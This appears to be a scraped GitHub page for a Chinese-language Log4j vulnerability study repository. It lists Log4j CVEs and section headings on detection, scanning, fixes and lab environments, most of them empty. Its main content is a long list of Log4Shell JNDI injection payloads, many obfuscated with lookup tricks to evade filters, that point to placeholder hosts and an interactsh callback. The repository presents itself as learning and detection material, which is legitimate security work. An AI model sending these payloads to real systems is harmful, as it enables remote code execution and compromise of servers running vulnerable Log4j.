Git Product home page Git Product logo

log4j2's Introduction

HackLog4j-永恒之恶龙

本项目用来致敬全宇宙最无敌的Java日志库!同时也记录自己在学习Log4j漏洞过程中遇到的一些内容。本项目会持续更新,本项目创建于2021年12月10日,最近的一次更新时间为2022年12月27日。作者:0e0w

00-Log4j永恒恶龙

01-Log4j基础知识

02-Log4j框架识别

  • 待更新

03-Log4j上层建筑

log4j + ? = rce !

04-Log4j漏洞汇总

  • CVE-2021-45105
  • CVE-2021-44228
  • CVE-2021-4104
  • CVE-2019-17571
  • CVE-2017-5645

05-Log4j检测利用

如何判断一个网站是否存在Log4j JNDI注入漏洞?如何查找内网中存在Log4j JNDI注入漏洞?

一、Payload

${jndi:ldap://127.0.0.1/poc}
${jndi:rmi://127.0.0.1/poc}
${jndi:dns://127.0.0.1/poc}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://127.0.0.1/poc}
${${::-j}ndi:rmi://127.0.0.1/poc}
${${lower:jndi}:${lower:rmi}://127.0.0.1/poc}
${${lower:${lower:jndi}}:${lower:rmi}://127.0.0.1/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://127.0.0.1/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://127.0.0.1/poc}
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}}://127.0.0.1/poc}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://127.0.0.1/poc}
$%7Bjndi:ldap://127.0.0.1/poc%7D
${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}127.0.0.1/poc}
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://127.0.0.1/poc}
${jndi:${lower:l}${lower:d}a${lower:p}://127.0.0.1/poc}
${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://127.0.0.1/poc}
${${env:TEST:-j}ndi${env:TEST:-:}${env:TEST:-l}dap${env:TEST:-:}127.0.0.1/poc}
${jndi:${lower:l}${lower:d}ap://127.0.0.1/poc}
${jndi:ldap://127.0.0.1#127.0.0.1/poc}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://k123.k123.k123/poc}
${${::-j}ndi:rmi://k123.k123.k123/ass}
${jndi:rmi://k8.k123.k123}
${${lower:jndi}:${lower:rmi}://k8.k123.k123/poc}
${${lower:${lower:jndi}}:${lower:rmi}://k8.k123.k123/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://k8.k123.k123/poc}
j${loWer:Nd}i${uPper::}
${jndi:ldaps://127.0.0.1/poc}
${jndi:iiop://127.0.0.1/poc}
${date:ldap://127.0.0.1/poc}
${java:ldap://127.0.0.1/poc}
${marker:ldap://127.0.0.1/poc}
${ctx:ldap://127.0.0.1/poc}
${lower:ldap://127.0.0.1/poc}
${upper:ldap://127.0.0.1/poc}
${main:ldap://127.0.0.1/poc}
${jvmrunargs:ldap://127.0.0.1/poc}
${sys:ldap://127.0.0.1/poc}
${env:ldap://127.0.0.1/poc}
${log4j:ldap://127.0.0.1/poc}
${j${k8s:k5:-ND}i${sd:k5:-:}${lower:l}d${lower:a}${lower:p}://${hostName}.{{interactsh-url}}}
${jndi:rmi://127.0.0.1}/
${jnd${123%25ff:-${123%25ff:-i:}}ldap://127.0.0.1/poc}
${jndi:dns://127.0.0.1}
${j${k8s:k5:-ND}i:ldap://127.0.0.1/poc}
${j${k8s:k5:-ND}i:ldap${sd:k5:-:}//127.0.0.1/poc}
${j${k8s:k5:-ND}i${sd:k5:-:}ldap://127.0.0.1/poc}
${j${k8s:k5:-ND}i${sd:k5:-:}ldap${sd:k5:-:}//127.0.0.1/poc}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}ldap://127.0.0.1/poc}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}ldap{sd:k5:-:}//127.0.0.1/poc}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//127.0.0.1/poc}
${j${k8s:k5:-ND}i${sd:k5:-:}${lower:L}dap${sd:k5:-:}//127.0.0.1/poc
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}a${::-p}${sd:k5:-:}//127.0.0.1/poc}
${jndi:${lower:l}${lower:d}a${lower:p}://127.0.0.1}
${jnd${upper:i}:ldap://127.0.0.1/poc}
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://127.0.0.1/poc}
${jndi:ldap://127.0.0.1#127.0.0.1:1389/poc}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://127.0.0.1/poc}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://127.0.0.1/poc}
${${lower:jndi}:${lower:ldap}://127.0.0.1/poc}
${${::-j}ndi:rmi://127.0.0.1/poc}
${${lower:${lower:jndi}}:${lower:ldap}://127.0.0.1/poc}
${${lower:jndi}:${lower:rmi}://127.0.0.1/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:ldap}://127.0.0.1/poc}
${${lower:${lower:jndi}}:${lower:rmi}://127.0.0.1/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:l}d${lower:a}p://127.0.0.1/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://127.0.0.1/poc}
${j${env:DOESNOTEXIST:-}ndi:ldap://127.0.0.1/poc}
${j${env:DOESNOTEXIST:-}ndi:rmi://127.0.0.1/poc}
${${: : : : ::: :: :: : :::-j}ndi:ldap://127.0.0.1/poc}
${${: : : : ::: :: :: : :::-j}ndi:rmi://127.0.0.1/poc}
${${::::::::::::::-j}ndi:ldap://127.0.0.1/poc}
${${::::::::::::::-j}ndi:rmi://127.0.0.1/poc}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://127.0.0.1/poc}

二、源码检测

三、出网检测

四、不出网检测

五、主动扫描

六、被动扫描

七、Header检测

八、请求参数检测

九、其他工具

06-Log4j漏洞修复

07-Log4j分析文章

08-Log4j靶场环境

Stargazers over time

log4j2's People

Contributors

0e0w avatar

Stargazers

avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar

Watchers

avatar avatar avatar avatar avatar

Forkers

z0edff0x3d jameszjm catcherman rays-l chivrs cream-sec qq529952515 nanaao fifa555 nd230 asiaforest kejaly m4tir atlassion j1ezds mcblog liszero thinkberry samy1937 jimdx zihaveadream xxcdd lijingpan easy233 warren-jace pochubs zwhubuntu dptechma fandu2014 scodelimb fbion ze4lfrog dingxiao77 test9032 nansjcn yukar1z0e artio-li tollytu yahaha01 slsis zsly001 lay0us1 jacks001314 0000000100000000 rassec zoombegod 30579096 5l1v3r1 just0rg flowind-hc xiaokp7 ashupup aaabbbcccdddeeef xibotao h30gyan

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.